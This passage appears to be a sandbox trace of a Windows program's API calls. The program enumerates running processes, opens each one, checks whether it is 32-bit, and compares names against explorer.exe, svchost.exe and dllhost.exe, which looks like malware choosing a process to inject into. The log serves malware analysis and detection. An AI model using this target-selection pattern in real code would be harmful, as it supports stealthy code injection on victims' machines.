dwProcessId=0x298) returned 0x0 [0211.475] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0211.475] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0211.476] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0211.476] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0211.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0211.477] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0211.477] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0211.478] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0211.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0211.478] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.478] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.478] CloseHandle (hObject=0xec) returned 1 [0211.478] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0211.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0211.479] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0211.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0211.479] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.479] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.479] CloseHandle (hObject=0xec) returned 1 [0211.479] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0211.480] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0211.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0211.480] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0211.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0211.481] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.481] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.481] CloseHandle (hObject=0xec) returned 1 [0211.481] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0211.481] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0211.481] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0211.481] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0211.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0211.482] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.482] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.482] CloseHandle (hObject=0xec) returned 1 [0211.482] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0211.482] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0211.482] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0211.482] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0211.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0211.482] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.482] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.483] CloseHandle (hObject=0xec) returned 1 [0211.483] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0211.483] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0211.483] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0211.483] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0211.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0211.483] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.483] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.483] CloseHandle (hObject=0xec) returned 1 [0211.483] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0211.483] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0211.483] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0211.483] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0211.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0211.484] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.484] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.484] CloseHandle (hObject=0xec) returned 1 [0211.484] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0211.484] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0211.484] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0211.484] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0211.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0211.485] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.485] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.485] CloseHandle (hObject=0xec) returned 1 [0211.485] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0211.485] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0211.485] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0211.485] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0211.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0211.485] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.485] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.485] CloseHandle (hObject=0xec) returned 1 [0211.485] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0211.485] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0211.486] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0211.486] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0211.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0211.486] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.486] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.486] CloseHandle (hObject=0xec) returned 1 [0211.486] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0211.486] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0211.486] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0211.486] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0211.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0211.487] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.487] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.487] CloseHandle (hObject=0xec) returned 1 [0211.487] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0211.487] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0211.487] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0211.487] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0211.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0211.487] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.487] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.487] CloseHandle (hObject=0xec) returned 1 [0211.488] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0211.488] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0211.488] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0211.488] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0211.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0211.488] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.488] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.488] CloseHandle (hObject=0xec) returned 1 [0211.488] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0211.488] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0211.488] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0211.488] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0211.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0211.489] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.489] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.489] CloseHandle (hObject=0xec) returned 1 [0211.489] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0211.489] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0211.489] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0211.489] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0211.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0211.490] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.490] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.490] CloseHandle (hObject=0xec) returned 1 [0211.490] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0211.490] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0211.490] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0211.490] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0211.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0211.490] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.490] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.490] CloseHandle (hObject=0xec) returned 1 [0211.490] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0211.490] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0211.490] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0211.490] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0211.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0211.491] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.491] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.491] CloseHandle (hObject=0xec) returned 1 [0211.491] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0211.491] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0211.491] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0211.491] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0211.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0211.492] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.492] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.492] CloseHandle (hObject=0xec) returned 1 [0211.492] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0211.492] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0211.492] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0211.492] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0211.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0211.492] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.492] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.492] CloseHandle (hObject=0xec) returned 1 [0211.493] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0211.493] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0211.493] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0211.493] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0211.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0211.493] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.493] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.493] CloseHandle (hObject=0xec) returned 1 [0211.493] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0211.493] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0211.493] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0211.493] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0211.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0211.494] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.494] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.494] CloseHandle (hObject=0xec) returned 1 [0211.494] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0211.494] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0211.494] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0211.494] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0211.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0211.494] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.494] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.495] CloseHandle (hObject=0xec) returned 1 [0211.495] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0211.495] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0211.495] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0211.495] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0211.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0211.495] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.495] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.495] CloseHandle (hObject=0xec) returned 1 [0211.495] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0211.495] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0211.495] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0211.495] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0211.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0211.496] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0211.496] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0211.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0211.497] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0211.497] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, 